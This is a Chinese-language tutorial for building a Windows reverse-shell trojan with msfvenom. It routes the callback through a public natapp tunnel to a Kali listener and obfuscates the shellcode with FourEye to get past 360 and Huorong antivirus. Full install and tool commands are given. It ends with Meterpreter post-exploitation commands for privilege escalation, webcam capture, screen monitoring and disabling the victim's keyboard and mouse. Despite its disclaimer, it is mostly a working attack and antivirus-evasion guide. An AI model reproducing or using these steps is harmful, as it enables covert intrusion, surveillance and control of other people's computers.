(声明:此文章仅用于技术交流不得用于危害其他计算机安全,任何未经授权的渗透行为都是网络犯罪!)
测试环境基于kali 6.8.11 64位与win11专业版及nataap的免费公网隧道(关闭实时保护未关闭防火墙)
1.建立靶机可访问的连接
首先在natapp注册购买免费隧道
注意更改协议为tcp
本地地址为kali的内网地址(终端输入ifconfig)
本地端口设置一个未被占用的端口(终端输入netstat -anp | grep 端口号查看对用端口占用情况)在此使用7777
下载linux64客户端拉进kali,新建名为natapp的文件夹,把下载好的文件拉入natapp文件夹
打开终端进入文件夹连接服务
等于号后面的id为上述图片authtoken后的文本
连接成功后效果如图
打开kali的终端利用msf的venom模块生成针对于windows平台tcp反弹连接的木马
默认保存在root目录下
lhost 为上述域名,lport为对应域名的端口
lhost为kali IP lport为公网隧道与kali 建立连接的端口 7777
开始监听 等待靶机运行木马生成反弹连接
2.FourEye免杀
msf自带免杀模块但效果基本没有
实测foureye免杀可过360和火绒,但是在后渗透阶段进入cmd后运行命令会被检测,不能过win11实时保护
安装pip3
wget https://bootstrap.pypa.io/get-pip.py
python3 get-pip.py
pip -V
安装mingw-w64(没换源的自行百度kali换源,本测试使用的为中科大源)
apt update
apt-get install mingw-w64
安装foureye并运行
git clone https://github.com/lengjibo/FourEye.git
cd FourEye
pip install -r requirements.txt
python3 BypassFramework.py
shellcode
1
xor
/root/test1.raw //文件路径
x86
execute
默认生成在根目录shellcode.exe
3.反弹shell连接
将shellcode传输到靶机上运行后kali成功建立连接(出现meterpreter即建立连接成功)
若靶机为本地用户administrator 可直接使用getsystem的到system权限
常用命令:
shell 进入对方终端
getuid 查看当前用户
getsystem 提权
webcam_list 列出摄像头
webcam_snap 使用摄像头拍照
webcam_stream 监视摄像头
screenshare 监视屏幕
uictl en/disable mouse 启用或禁用鼠标
uictl en/disable keyboard 启用或禁用键盘
更多后渗透命令可参考